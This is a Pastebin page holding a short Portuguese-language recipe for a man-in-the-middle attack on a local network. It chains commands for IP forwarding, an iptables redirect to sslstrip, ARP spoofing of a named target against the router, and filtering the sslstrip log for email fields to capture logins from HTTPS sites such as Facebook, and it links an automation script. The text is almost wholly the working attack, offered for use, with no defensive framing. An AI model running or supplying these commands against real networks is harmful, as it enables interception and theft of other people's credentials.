Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- echo "1" > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
- sslstrip -a -l 8080
- arpspoof -i eth0 -t 192.168.0.25 192.168.0.1(ip do roteador)
- tail -f sslstrip.log | grep "email="
- #echo
- Ativar o repasse de pacotes
- #iptables
- Criar um redirecionamento de conexões no IPTABLES
- #sslstrip
- Pro ataque podemos usar o básico, a opção -a e -l
- como definimos a porta 8080 no começo, é esta que vamos usar
- Porem como não somos o gateway da rede, precisamos forçar o trafego a passar por nós, uma das formas mais comuns é o ARP SPOOF
- Alvo = 192.168.0.25
- Atacante = 192.168.0.102
- Após o comando arpspoof até ai tranquilo, agora basta que o alvo acesse algum site HTTPS como facebook e o sslstrip vai logar os dados em sslstrip.log
- #filtrar a saída em busca de email
- tail -f sslstrip.log | grep "email="
- Caso não queira ficar digitando esses comandos direto você usa esse script https://comax.fr/index.php yamas.sh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement